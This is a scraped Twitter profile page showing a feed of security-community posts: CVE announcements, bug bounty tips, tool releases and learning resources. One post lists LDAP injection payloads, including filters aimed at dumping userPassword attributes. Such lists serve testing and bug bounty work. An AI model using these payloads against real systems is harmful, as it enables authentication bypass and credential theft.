Msfcode (@msfcode) 's Twitter Profile

The road ahead is long and far; I shall search high and low.

ID: 989554593314074626

26-04-2018 17:19:34

193 Tweet

172 Followers

310 Following

spidersec (@spidersec) 's Twitter Profile Photo

Got a new CVE 😃 Title: phpList Authentication Bypass CVE ID: CVE-2020-8547 Vulnerability Type: PHP type Juggling / Loose Comparison

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] #BugbountyTip: CVE-2016-0956 - Apache Sling Core Framework Information Disclosure Vulnerability <-- You can still find many vulnerable AEM Instances (free to contact me if you need help understanding this one) #Bugbounty #TogetherWeHitHarder #BugBountyTip

Solomon Yue (@solomonyue) 's Twitter Profile Photo

My list of 137 publicly reported Chinese espionage cases against🇺🇸since 2000. The list doesn't include 4🇨🇳PLA hackers charged 4 hacking into credit reporting agency Equifax today. shorturl.at/nRTU3 Now I share both w/ you & Consul General CG_Zha Liyou查立友. csis-prod.s3.amazonaws.com/s3fs-public/19…

yuange (@yuange75) 's Twitter Profile Photo

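xueqiu.com/9455873430/143… $Weibo (WB)$ #Sina Weibo and Weibo Jieqian are scam companies, predatory lending and loan sharking# My English is not good; who is able to file a complaint with the U.S. SEC, and with Apple, to get it taken down? I can pay a reasonable fee for translation, filing the complaint, and so on.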

chybeta (@chybeta) 's Twitter Profile Photo

CVE-2020-10204 Nexus Repository Manager 3 - Remote Code Execution Well, EL Injection support.sonatype.com/hc/en-us/secti…

Michael Gillespie (@demonslay335) 's Twitter Profile Photo

🔒New CryptoTester v1.4.0.2 for #ransomware analysis 🔎: TONS of fixes/additions to hexboxes, grouped algorithms in dropdown, flip endianness of keys, AES XTS mode, HMAC key derives, raw RSA (provide n + d/e, no padding), redesigned bruteforce key tool, lots of bugfixes.

rapiddns (@rapiddns) 's Twitter Profile Photo

6000+ hackerone disclosed reports docs.google.com/spreadsheets/d… #bugbountytips #bugbountytip #bugbounties #hackerone #vulnerabilities #xxe #xss #sqli #ssrf #RCE

The Hacker News (@thehackersnews) 's Twitter Profile Photo

Playing with GZIP! All versions of GLPI, an open source IT asset management app, released in the last 10 years are vulnerable to an RCE (CVE-2020-11060) flaw through backup feature. offsec.almond.consulting/playing-with-g… The bug has been patched with the release of v9.4.6. via Almond OffSec

Shreyas R Gujar 🇮🇳 (@shreyasrx) 's Twitter Profile Photo

LDAP Injection 💥 1/3 Payloads : * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y #bugbountytips #shieldindia

Windows Portable Apps (@wpa_1) 's Twitter Profile Photo

2 years have passed and he still didn't crack none of them! Lol! ("Multi One Password" is indeed a Real and The Most Secure #PasswordManager!) x.com/WPA_1/status/1… . Terahash Jeremi M Gosney L0phtCrack #Infosec #netsec #cybersec #cybersecurity #hashcat #bcrypt #defcon

Florian Hansemann (@cyberwarship) 's Twitter Profile Photo

"VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive" #infosec #redteam #redteam horizon3.ai/vmware-authent…

Marcel Böhme👨‍🔬 (@mboehme_) 's Twitter Profile Photo

What would you do if you could spend 1 week with the creators of the most widely-used bug finding tools? * AFL++ * LibFuzzer / ASAN * Syzkaller * KLEE * OSSFuzz * OneFuzz * SQLancer * FuzzingBook / DebuggingBook * Infer * Clang SA * Findbugs / Tricorder * Soot / FlowDroid ...

Cos(余弦)😶‍🌫️ (@evilcos) 's Twitter Profile Photo

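Since some friends have asked how to get started in Web3 security (especially smart contract security), let me briefly list some resources that I currently think are pretty good. Keep in mind: in this field, what matters most is hands-on practice; you need to keep accumulating experience in this area day in and day out, over the long term, before you can achieve anything. Also, interest is definitely the biggest driving force; working in fits and starts is not interest, it is self-deception...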

shubs (@infosec_au) 's Twitter Profile Photo

We've analyzed the patch diffs for CVE-2023-3519 (Citrix Pre-Auth RCE) and have published our findings so far on our blog post here: blog.assetnote.io/2023/07/21/cit… So far, we haven't found an endpoint where this issue is exploitable without SAML being enabled. Will update blog if we

CFC4N (@cfc4n) 's Twitter Profile Photo

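github.com/elastic/otel-p… It can directly support observability for programs written in high-level languages such as JAVA, PHP, Python, and GO. It does not rely on the high-level language's symbol table or DWARF information, and resolves directly to Java-layer language symbols. I experimented with it a little, and it could even serve as a technical approach for future RASP. It avoids the STW performance jitter caused by dynamic Java Agent injection. So powerful it is sc...sc...sc...ary...ary....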
